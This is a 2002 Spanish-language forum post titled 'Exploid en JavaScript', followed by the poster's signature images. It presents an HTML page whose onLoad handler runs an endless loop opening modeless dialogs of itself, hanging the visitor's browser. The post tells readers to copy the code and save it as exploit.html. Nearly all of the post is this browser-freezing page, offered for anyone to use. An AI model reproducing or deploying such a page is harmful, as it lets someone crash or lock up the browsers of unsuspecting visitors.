Ver Mensaje Individual
  #1 (permalink)  
Antiguo 11/01/2002, 18:41
xombra
 
Fecha de Ingreso: diciembre-2001
Mensajes: 47
Antigüedad: 22 años, 5 meses
Puntos: 0
Exploid en JavaScript

Al usar este kodigo, la pagina se karga indefinidamente.

Copia este kodigo y guardalo kon el nombre de exploit.html


<html>
<head>
<script language="javascript">
function exploit() {
kolgada=1
while(kolgada=1) {
showModelessDialog("exploit.html");
}
}
</script>
</head>
<body onLoad="exploit()">
</body>
</html

<html><body>
<p><img border="0" src="http://www.suarsystem.com/xombra/logofirmasawven.jpg" width="50" height="58"><img border="0" src="http://www.suarsystem.com/xombra/xombra210.gif" width="166" height="89"></p>
</body></html>